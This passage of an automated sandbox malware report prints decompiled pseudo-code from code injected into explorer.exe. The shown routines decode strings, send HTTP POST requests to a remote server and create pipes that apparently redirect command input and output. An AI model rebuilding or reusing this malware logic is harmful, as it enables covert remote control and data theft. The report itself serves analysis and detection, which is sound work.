                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: ClassCurrentProcessWindow$CreateDestroyFreeHeapRegisterUnregister
                            • String ID: 0$cdcdwqwqwq$sadccdcdsasa
                            • API String ID: 3082384575-2319545179
                            • Opcode ID: 02bb1ad92d60b0a51ae2d737851878b8f1f48e9aba036c56837a39e0fe15ab61
                            • Instruction ID: d3e88f71527c21399528f0c4bf061e6e508ee729baa66594f0f525f79852064d
                            • Opcode Fuzzy Hash: 02bb1ad92d60b0a51ae2d737851878b8f1f48e9aba036c56837a39e0fe15ab61
                            • Instruction Fuzzy Hash: 49712971900249EFEB10DF95DC49EEEBBB9FB89710F14406AF605A7290DB74AE04CB64
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
                            				char _v8;
                            				char _v16;
                            				short _v144;
                            				short _v664;
                            				void* _t19;
                            				struct HINSTANCE__* _t22;
                            				long _t23;
                            				long _t24;
                            				char* _t27;
                            				WCHAR* _t32;
                            				long _t33;
                            				intOrPtr _t37;
                            				intOrPtr _t38;
                            				void* _t49;
                            				int _t53;
                            				void* _t54;
                            				intOrPtr* _t55;
                            				void* _t57;
                            
                            				_t49 = __edx;
                            				OutputDebugStringA("Hello qqq");
                            				if(_a8 != 1) {
                            					if(_a8 != 0) {
                            						L12:
                            						return 1;
                            					}
                            					SetLastError(0xaa);
                            					L10:
                            					return 0;
                            				}
                            				E000885EF();
                            				_t19 = E0008980C( &_v16);
                            				_t57 = _t49;
                            				if(_t57 < 0 || _t57 <= 0 && _t19 < 0x2e830) {
                            					goto L12;
                            				} else {
                            					E00088F78();
                            					GetModuleHandleA(0);
                            					_t22 = _a4;
                            					 *0x9e69c = _t22;
                            					_t23 = GetModuleFileNameW(_t22,  &_v664, 0x104);
                            					_t24 = GetLastError();
                            					if(_t23 != 0 && _t24 != 0x7a) {
                            						memset( &_v144, 0, 0x80);
                            						_t55 = _t54 + 0xc;
                            						_t53 = 0;
                            						do {
                            							_t27 = E000895C7(_t53);
                            							_a8 = _t27;
                            							MultiByteToWideChar(0, 0, _t27, 0xffffffff,  &_v144, 0x3f);
                            							E000885C2( &_a8);
                            							_t53 = _t53 + 1;
                            						} while (_t53 < 0x2710);
                            						E00092A5B( *0x9e69c);
                            						 *_t55 = 0x7c3;
                            						 *0x9e684 = E0008E1BC(0x9ba28, 0x11c);
                            						 *_t55 = 0xb4e;
                            						_t32 = E000895E1(0x9ba28);
                            						_a8 = _t32;
                            						_t33 = GetFileAttributesW(_t32);
                            						_push( &_a8);
                            						if(_t33 == 0xffffffff) {
                            							E000885D5();
                            							_v8 = 0;
                            							_t37 =  *0x9e684; // 0x286f8f0
                            							_t38 =  *((intOrPtr*)(_t37 + 0x70))(0, 0, E00085E06, 0, 0,  &_v8);
                            							 *0x9e6a8 = _t38;
                            							if(_t38 == 0) {
                            								goto L10;
                            							}
                            							goto L12;
                            						}
                            						E000885D5();
                            					}
                            					goto L10;
                            				}
                            			}

                            APIs
                            • OutputDebugStringA.KERNEL32(Hello qqq), ref: 00085F92
                            • SetLastError.KERNEL32(000000AA), ref: 000860D7
                              • Part of subcall function 000885EF: HeapCreate.KERNELBASE(00000000,00080000,00000000,00085FA7), ref: 000885F8
                              • Part of subcall function 0008980C: GetSystemTimeAsFileTime.KERNEL32(?,?,00085FAF), ref: 00089819
                              • Part of subcall function 0008980C: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00089839
                            • GetModuleHandleA.KERNEL32(00000000), ref: 00085FCC
                            • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00085FE7
                            • GetLastError.KERNEL32 ref: 00085FEF
                            • memset.MSVCRT ref: 00086013
                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 00086035
                            • GetFileAttributesW.KERNEL32(00000000), ref: 00086083
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$ErrorLastModuleTime$AttributesByteCharCreateDebugHandleHeapMultiNameOutputStringSystemUnothrow_t@std@@@Wide__ehfuncinfo$??2@memset
                            • String ID: Hello qqq
                            • API String ID: 1203100507-3610097158
                            • Opcode ID: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                            • Instruction ID: 5d8fc15084eb67a1e967e79224f0c4bd4c543ae9b3caa409572413b5ae1d139a
                            • Opcode Fuzzy Hash: 8b96a12faa54738855b03958d39a9c9ad27c69214fa689d017f1ccf1e08c0267
                            • Instruction Fuzzy Hash: AD31A771900544ABEB64BF30DC49EAF37B8FB81720F10852AF495C6292DF389A49DF21
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E0008E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
                            				char _v8;
                            				char _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				char _v24;
                            				intOrPtr _v28;
                            				char _v32;
                            				intOrPtr _v36;
                            				signed int _v40;
                            				signed int _v44;
                            				intOrPtr _v48;
                            				intOrPtr _v52;
                            				intOrPtr _v56;
                            				intOrPtr _v60;
                            				char _v64;
                            				int _v76;
                            				void* _v80;
                            				intOrPtr _v100;
                            				int _v104;
                            				void* _v108;
                            				intOrPtr _v112;
                            				intOrPtr _v116;
                            				char* _v120;
                            				void _v124;
                            				char _v140;
                            				void _v396;
                            				void _v652;
                            				intOrPtr _t105;
                            				intOrPtr _t113;
                            				intOrPtr* _t115;
                            				intOrPtr _t118;
                            				intOrPtr _t121;
                            				intOrPtr _t124;
                            				intOrPtr _t127;
                            				intOrPtr _t131;
                            				char _t133;
                            				intOrPtr _t136;
                            				char _t138;
                            				char _t139;
                            				intOrPtr _t141;
                            				intOrPtr _t147;
                            				intOrPtr _t154;
                            				intOrPtr _t158;
                            				intOrPtr _t162;
                            				intOrPtr _t164;
                            				intOrPtr _t166;
                            				intOrPtr _t172;
                            				intOrPtr _t176;
                            				void* _t183;
                            				void* _t185;
                            				intOrPtr _t186;
                            				char _t195;
                            				intOrPtr _t203;
                            				intOrPtr _t204;
                            				signed int _t209;
                            				void _t212;
                            				intOrPtr _t213;
                            				void* _t214;
                            				intOrPtr _t216;
                            				char _t217;
                            				intOrPtr _t218;
                            				signed int _t219;
                            				signed int _t220;
                            				void* _t221;
                            
                            				_v40 = _v40 & 0x00000000;
                            				_v24 = 4;
                            				_v36 = 1;
                            				_t214 = __edx;
                            				memset( &_v396, 0, 0x100);
                            				memset( &_v652, 0, 0x100);
                            				_v64 = E000895C7(0x85b);
                            				_v60 = E000895C7(0xdc9);
                            				_v56 = E000895C7(0x65d);
                            				_v52 = E000895C7(0xdd3);
                            				_t105 = E000895C7(0xb74);
                            				_v44 = _v44 & 0;
                            				_t212 = 0x3c;
                            				_v48 = _t105;
                            				memset( &_v124, 0, 0x100);
                            				_v116 = 0x10;
                            				_v120 =  &_v140;
                            				_v124 = _t212;
                            				_v108 =  &_v396;
                            				_v104 = 0x100;
                            				_v80 =  &_v652;
                            				_push( &_v124);
                            				_push(0);
                            				_v76 = 0x100;
                            				_push(E0008C379(_t214));
                            				_t113 =  *0x9e6a4; // 0x28531f8
                            				_push(_t214);
                            				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
                            					_t209 = 0;
                            					_v20 = 0;
                            					do {
                            						_t115 =  *0x9e6a4; // 0x28531f8
                            						_v12 = 0x8404f700;
                            						_t213 =  *_t115( *0x9e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
                            						if(_t213 != 0) {
                            							_t195 = 3;
                            							_t185 = 4;
                            							_v8 = _t195;
                            							_t118 =  *0x9e6a4; // 0x28531f8
                            							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
                            							_v8 = 0x3a98;
                            							_t121 =  *0x9e6a4; // 0x28531f8
                            							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
                            							_v8 = 0x493e0;
                            							_t124 =  *0x9e6a4; // 0x28531f8
                            							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
                            							_v8 = 0x493e0;
                            							_t127 =  *0x9e6a4; // 0x28531f8
                            							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
                            							_t131 =  *0x9e6a4; // 0x28531f8
                            							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
                            							if(_a24 != 0) {
                            								E0008980C(_a24);
                            							}
                            							if(_t186 != 0) {
                            								_t133 = 0x8484f700;
                            								if(_v112 != 4) {
                            									_t133 = _v12;
                            								}
                            								_t136 =  *0x9e6a4; // 0x28531f8
                            								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
                            								_v8 = _t216;
                            								if(_a24 != 0) {
                            									E0008980C(_a24);
                            								}
                            								if(_t216 != 0) {
                            									_t138 = 4;
                            									if(_v112 != _t138) {
                            										L19:
                            										_t139 = E000895C7(0x777);
                            										_t217 = _t139;
                            										_v12 = _t217;
                            										_t141 =  *0x9e6a4; // 0x28531f8
                            										_t218 = _v8;
                            										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E0008C379(_t217), _a4, _a8);
                            										E000885C2( &_v12);
                            										if(_a24 != 0) {
                            											E0008980C(_a24);
                            										}
                            										if(_v28 != 0) {
                            											L28:
                            											_v24 = 8;
                            											_push(0);
                            											_v32 = 0;
                            											_v28 = 0;
                            											_push( &_v24);
                            											_push( &_v32);
                            											_t147 =  *0x9e6a4; // 0x28531f8
                            											_push(0x13);
                            											_push(_t218);
                            											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
                            												_t219 = E00089749( &_v32);
                            												if(_t219 == 0xc8) {
                            													 *_a20 = _v8;
                            													 *_a12 = _t213;
                            													 *_a16 = _t186;
                            													return 0;
                            												}
                            												_t220 =  ~_t219;
                            												L32:
                            												_t154 =  *0x9e6a4; // 0x28531f8
                            												 *((intOrPtr*)(_t154 + 8))(_v8);
                            												L33:
                            												if(_t186 != 0) {
                            													_t158 =  *0x9e6a4; // 0x28531f8
                            													 *((intOrPtr*)(_t158 + 8))(_t186);
                            												}
                            												if(_t213 != 0) {
                            													_t203 =  *0x9e6a4; // 0x28531f8
                            													 *((intOrPtr*)(_t203 + 8))(_t213);
                            												}
                            												return _t220;
                            											}
                            											GetLastError();
                            											_t220 = 0xfffffff8;
                            											goto L32;
                            										} else {
                            											GetLastError();
                            											_t162 =  *0x9e6a4; // 0x28531f8
                            											 *((intOrPtr*)(_t162 + 8))(_t218);
                            											_t218 = 0;
                            											goto L23;
                            										}
                            									}
                            									_v12 = _t138;
                            									_push( &_v12);
                            									_push( &_v16);
                            									_t172 =  *0x9e6a4; // 0x28531f8
                            									_push(0x1f);
                            									_push(_t216);
                            									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
                            										L18:
                            										GetLastError();
                            										goto L19;
                            									}
                            									_v16 = _v16 | 0x00003380;
                            									_push(4);
                            									_push( &_v16);
                            									_t176 =  *0x9e6a4; // 0x28531f8
                            									_push(0x1f);
                            									_push(_t216);
                            									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
                            										goto L19;
                            									}
                            									goto L18;
                            								} else {
                            									GetLastError();
                            									L23:
                            									_t164 =  *0x9e6a4; // 0x28531f8
                            									 *((intOrPtr*)(_t164 + 8))(_t186);
                            									_t186 = 0;
                            									goto L24;
                            								}
                            							} else {
                            								GetLastError();
                            								L24:
                            								_t166 =  *0x9e6a4; // 0x28531f8
                            								 *((intOrPtr*)(_t166 + 8))(_t213);
                            								_t213 = 0;
                            								goto L25;
                            							}
                            						}
                            						GetLastError();
                            						L25:
                            						_t204 = _t218;
                            						_t209 = _v20 + 1;
                            						_v20 = _t209;
                            					} while (_t209 < 2);
                            					_v8 = _t218;
                            					if(_t204 != 0) {
                            						goto L28;
                            					}
                            					_t220 = 0xfffffffe;
                            					goto L33;
                            				}
                            				_t183 = 0xfffffffc;
                            				return _t183;
                            			}

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: memset$ErrorLast
                            • String ID: POST
                            • API String ID: 2570506013-1814004025
                            • Opcode ID: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                            • Instruction ID: ea6434b96816f391ca67125378d8c048189af0a816e14d9e93347baa296bf716
                            • Opcode Fuzzy Hash: 367a7a72f7db2160077767910a4473ccd00a1e93e961edb2d3cd1ed941d500fc
                            • Instruction Fuzzy Hash: 50B13C71900208AFEB55EFA4DC89EAE7BB8FF58310F10406AF545EB291DB749E44CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 28%
                            			E000916B8(signed int* _a4) {
                            				char _v8;
                            				_Unknown_base(*)()* _v12;
                            				_Unknown_base(*)()* _v16;
                            				char _v20;
                            				_Unknown_base(*)()* _t16;
                            				_Unknown_base(*)()* _t17;
                            				void* _t22;
                            				intOrPtr* _t28;
                            				signed int _t29;
                            				signed int _t30;
                            				struct HINSTANCE__* _t32;
                            				void* _t34;
                            
                            				_t30 = 0;
                            				_v8 = 0;
                            				_t32 = GetModuleHandleA("advapi32.dll");
                            				if(_t32 == 0) {
                            					L9:
                            					return 1;
                            				}
                            				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
                            				_v12 = _t16;
                            				if(_t16 == 0) {
                            					goto L9;
                            				}
                            				_t17 = GetProcAddress(_t32, "CryptGenRandom");
                            				_v16 = _t17;
                            				if(_t17 == 0) {
                            					goto L9;
                            				}
                            				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
                            				if(_t28 == 0) {
                            					goto L9;
                            				}
                            				_push(0xf0000000);
                            				_push(1);
                            				_push(0);
                            				_push(0);
                            				_push( &_v8);
                            				if(_v12() == 0) {
                            					goto L9;
                            				}
                            				_t22 = _v16(_v8, 4,  &_v20);
                            				 *_t28(_v8, 0);
                            				if(_t22 == 0) {
                            					goto L9;
                            				}
                            				_t29 = 0;
                            				do {
                            					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
                            					_t29 = _t29 + 1;
                            				} while (_t29 < 4);
                            				 *_a4 = _t30;
                            				return 0;
                            			}

                            APIs
                            • GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,0008765A,?,?,00000000,?), ref: 000916CB
                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 000916E3
                            • GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 000916F2
                            • GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 00091701
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule
                            • String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
                            • API String ID: 667068680-129414566
                            • Opcode ID: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                            • Instruction ID: f7ee788a374f61118607f953ef7ffa495e5dc05b0280f9c56cf14542586de261
                            • Opcode Fuzzy Hash: 27f9b75c89bbff0010089760dc2ea391a5fe869bbdee21b5a79a33e181e9a0cc
                            • Instruction Fuzzy Hash: B5117731B046177BDF515BEA8C84EEFBBF9AF46780B044065FA15F6240DA70D901A764
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 87%
                            			E00092122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                            				signed int _t12;
                            				signed int _t13;
                            				int _t15;
                            				char* _t24;
                            				char* _t26;
                            				char* _t28;
                            				char* _t29;
                            				signed int _t40;
                            				char* _t43;
                            				char* _t45;
                            				long long* _t47;
                            
                            				_t12 = _a20;
                            				if(_t12 == 0) {
                            					_t12 = 0x11;
                            				}
                            				_t26 = _a4;
                            				_push(_t30);
                            				 *_t47 = _a12;
                            				_push(_t12);
                            				_push("%.*g");
                            				_push(_a8);
                            				_push(_t26);
                            				L00092285();
                            				_t40 = _t12;
                            				if(_t40 < 0 || _t40 >= _a8) {
                            					L19:
                            					_t13 = _t12 | 0xffffffff;
                            					goto L20;
                            				} else {
                            					L000922CD();
                            					_t15 =  *((intOrPtr*)( *_t12));
                            					if(_t15 != 0x2e) {
                            						_t24 = strchr(_t26, _t15);
                            						if(_t24 != 0) {
                            							 *_t24 = 0x2e;
                            						}
                            					}
                            					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
                            						L11:
                            						_t43 = strchr(_t26, 0x65);
                            						_t28 = _t43;
                            						if(_t43 == 0) {
                            							L18:
                            							_t13 = _t40;
                            							L20:
                            							return _t13;
                            						}
                            						_t45 = _t43 + 1;
                            						_t29 = _t28 + 2;
                            						if( *_t45 == 0x2d) {
                            							_t45 = _t29;
                            						}
                            						while( *_t29 == 0x30) {
                            							_t29 = _t29 + 1;
                            						}
                            						if(_t29 != _t45) {
                            							E00088706(_t45, _t29, _t40 - _t29 + _a4);
                            							_t40 = _t40 + _t45 - _t29;
                            						}
                            						goto L18;
                            					} else {
                            						_t6 = _t40 + 3; // 0x909b2
                            						_t12 = _t6;
                            						if(_t12 >= _a8) {
                            							goto L19;
                            						}
                            						_t26[_t40] = 0x302e;
                            						( &(_t26[2]))[_t40] = 0;
                            						_t40 = _t40 + 2;
                            						goto L11;
                            					}
                            				}
                            			}

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: strchr$_snprintflocaleconv
                            • String ID: %.*g
                            • API String ID: 1910550357-952554281
                            • Opcode ID: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                            • Instruction ID: 1807b53470dfa9210b137be6f10a1510799a81b613ee7934cd0fe15d2e85ebbb
                            • Opcode Fuzzy Hash: ce2afa961fa85e74440034e363737a64cfa4b0764273ec5c58c06da3881b6a43
                            • Instruction Fuzzy Hash: 8E216A766047427ADF259A28DCC6BEA3BDCDF25330F150155FE509A182EA74EC60B3A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: _snprintfqsort
                            • String ID: %I64d$false$null$true
                            • API String ID: 756996078-4285102228
                            • Opcode ID: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                            • Instruction ID: e8f87335b98eb15e4b72e6aadc3c6444a94586e470a32963d335527edd021b66
                            • Opcode Fuzzy Hash: c3656f1e48f6528892983799641ac3336606c700c83bb0b62e38ba968db40f99
                            • Instruction Fuzzy Hash: F1E17DB190020ABFDF119F64CC46EEF3BA9EF55384F108019FE1596152EB31DA61EBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SysAllocString.OLEAUT32(00000000), ref: 0008D75C
                            • SysAllocString.OLEAUT32(?), ref: 0008D764
                            • SysAllocString.OLEAUT32(00000000), ref: 0008D778
                            • SysFreeString.OLEAUT32(?), ref: 0008D7F3
                            • SysFreeString.OLEAUT32(?), ref: 0008D7F6
                            • SysFreeString.OLEAUT32(?), ref: 0008D7FB
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: String$AllocFree
                            • String ID:
                            • API String ID: 344208780-0
                            • Opcode ID: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                            • Instruction ID: a89b29efd16a02d44f6d8e25ac1661f5a2b1d21aaf5940480051179919990030
                            • Opcode Fuzzy Hash: 0ae35b3864b79a2002ceb2acc07a6214e28e9f75c0e65d5a7fc5e6ecf6b65d72
                            • Instruction Fuzzy Hash: 1821F975900218AFDB10EFA5CC88DAFBBBDFF48654B10449AF505E7250DA71AE01CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID: @$\u%04X$\u%04X\u%04X
                            • API String ID: 0-2132903582
                            • Opcode ID: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                            • Instruction ID: fcde36fe93850f7dd9ad1ae31ae76e92f94782fe824cdb2d7e9ac6baa3171ba9
                            • Opcode Fuzzy Hash: ad3677773898463b826370865ef61fb4a1262acb6dcbc071cab37c5794fd638b
                            • Instruction Fuzzy Hash: C6411931700205EFEF784A9CCD9ABBF2AA8DF45340F244125F986D6396DA61CD91B3D1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 30%
                            			E0008D523(void* __ecx) {
                            				char _v8;
                            				void* _v12;
                            				char* _t15;
                            				intOrPtr* _t16;
                            				void* _t21;
                            				intOrPtr* _t23;
                            				intOrPtr* _t24;
                            				intOrPtr* _t25;
                            				void* _t30;
                            				void* _t33;
                            
                            				_v12 = 0;
                            				_v8 = 0;
                            				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                            				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                            				_t15 =  &_v12;
                            				__imp__CoCreateInstance(0x9b848, 0, 1, 0x9b858, _t15);
                            				if(_t15 < 0) {
                            					L5:
                            					_t23 = _v8;
                            					if(_t23 != 0) {
                            						 *((intOrPtr*)( *_t23 + 8))(_t23);
                            					}
                            					_t24 = _v12;
                            					if(_t24 != 0) {
                            						 *((intOrPtr*)( *_t24 + 8))(_t24);
                            					}
                            					_t16 = 0;
                            				} else {
                            					__imp__#2(__ecx);
                            					_t25 = _v12;
                            					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                            					if(_t21 < 0) {
                            						goto L5;
                            					} else {
                            						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                            						if(_t21 < 0) {
                            							goto L5;
                            						} else {
                            							_t16 = E00088604(8);
                            							if(_t16 == 0) {
                            								goto L5;
                            							} else {
                            								 *((intOrPtr*)(_t16 + 4)) = _v12;
                            								 *_t16 = _v8;
                            							}
                            						}
                            					}
                            				}
                            				return _t16;
                            			}














                            APIs
                            • CoInitializeEx.OLE32(00000000,00000000), ref: 0008D536
                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0008D547
                            • CoCreateInstance.OLE32(0009B848,00000000,00000001,0009B858,?), ref: 0008D55E
                            • SysAllocString.OLEAUT32(00000000), ref: 0008D569
                            • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0008D594
                              • Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                            • String ID:
                            • API String ID: 1610782348-0
                            • Opcode ID: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
                            • Instruction ID: 5ca9e363416111ca0ccf9453dcb24a0453d396344b9ddfdbf921160754929c58
                            • Opcode Fuzzy Hash: 61e718e46d9626c6fc607ac76e9c554d5449760960f597cd4dce1a0c96a4aa07
                            • Instruction Fuzzy Hash: 6F21E970600245BBEB249B66DC4DE6FBFBCFFC6B25F10415EB541A62A0DA709A01CB30
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 79%
                            			E000921FF(char* __eax, char** _a4, long long* _a8) {
                            				char* _v8;
                            				long long _v16;
                            				char* _t9;
                            				signed char _t11;
                            				char** _t19;
                            				char _t22;
                            				long long _t32;
                            				long long _t33;
                            
                            				_t9 = __eax;
                            				L000922CD();
                            				_t19 = _a4;
                            				_t22 =  *__eax;
                            				if( *_t22 != 0x2e) {
                            					_t9 = strchr( *_t19, 0x2e);
                            					if(_t9 != 0) {
                            						 *_t9 =  *_t22;
                            					}
                            				}
                            				L00092291();
                            				 *_t9 =  *_t9 & 0x00000000;
                            				_t11 = strtod( *_t19,  &_v8);
                            				asm("fst qword [ebp-0xc]");
                            				_t32 =  *0x98250;
                            				asm("fucomp st1");
                            				asm("fnstsw ax");
                            				if((_t11 & 0x00000044) != 0) {
                            					L5:
                            					st0 = _t32;
                            					L00092291();
                            					if( *_t11 != 0x22) {
                            						_t33 = _v16;
                            						goto L8;
                            					} else {
                            						return _t11 | 0xffffffff;
                            					}
                            				} else {
                            					_t33 =  *0x98258;
                            					asm("fucomp st1");
                            					asm("fnstsw ax");
                            					if((_t11 & 0x00000044) != 0) {
                            						L8:
                            						 *_a8 = _t33;
                            						return 0;
                            					} else {
                            						goto L5;
                            					}
                            				}
                            			}












                            APIs
                            Memory Dump Source
                            • Source File: 00000007.00000002.875259160.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_7_2_80000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: _errno$localeconvstrchrstrtod
                            • String ID:
                            • API String ID: 1035490122-0
                            • Opcode ID: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                            • Instruction ID: 9be57ecffa989f7d2828815fae2d17a9d7f4e019258d81125002a8d3572c8328
                            • Opcode Fuzzy Hash: de4c433de47fb25370494944294a547a5aa963e4291e7017832a2afbf295a471
                            • Instruction Fuzzy Hash: 7701F239904205FADF127F24E9057DD7BA8AF4B360F2041D1E9D0A61E2DB759854E7A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 73%
                            			E0008A9B7(signed int __ecx) {
                            				void* _v8;
                            				void* _v12;
                            				void* _v16;
                            				void* _v20;
                            				signed int _v24;
                            				char _v28;
                            				char _v32;
                            				char _v36;
                            				struct _SECURITY_ATTRIBUTES _v48;
                            				intOrPtr _v60;
                            				char _v64;
                            				intOrPtr _v76;
                            				intOrPtr _v80;
                            				void* _v84;
                            				short _v92;
                            				intOrPtr _v96;
                            				void _v140;
                            				intOrPtr _t77;
                            				void* _t79;
                            				intOrPtr _t85;
                            				intOrPtr _t87;
                            				intOrPtr _t89;
                            				intOrPtr _t92;
                            				intOrPtr _t98;
                            				intOrPtr _t100;
                            				intOrPtr _t102;
                            				long _t111;
                            				intOrPtr _t115;
                            				intOrPtr _t126;
                            				void* _t127;
                            				void* _t128;
                            				void* _t129;
                            				void* _t130;
                            
                            				_t111 = 0;
                            				_v24 = __ecx;
                            				_v12 = 0;
                            				_v20 = 0;
                            				_t127 = 0;
                            				_v8 = 0;
                            				_v16 = 0;
                            				_v48.nLength = 0xc;
                            				_v48.lpSecurityDescriptor = 0;
                            				_v48.bInheritHandle = 1;
                            				_v28 = 0;
                            				memset( &_v140, 0, 0x44);
                            				asm("stosd");
                            				_t130 = _t129 + 0xc;
                            				asm("stosd");
                            				asm("stosd");
                            				asm("stosd");
                            				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
                            					L18:
                            					return 0;
                            				}
                            				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
                            					L13:
                            					E0008861A( &_v28, 0);
                            					if(_v20 != 0) {
                            						_t77 =  *0x9e684; // 0x286f8f0
                            						 *((intOrPtr*)(_t77 + 0x30))(_v20);
                            					}
                            					if(_v8 != 0) {
                            						_t115 =  *0x9e684; // 0x286f8f0
                            						 *((intOrPtr*)(_t115 + 0x30))(_v8);
                            					}
                            					return _t111;
                            				}
                            				_t79 = _v16;
                            				_v76 = _t79;
                            				_v80 = _t79;
                            				_v84 = _v12;
                            				_v140 = 0x44;
                            				_v96 = 0x101;
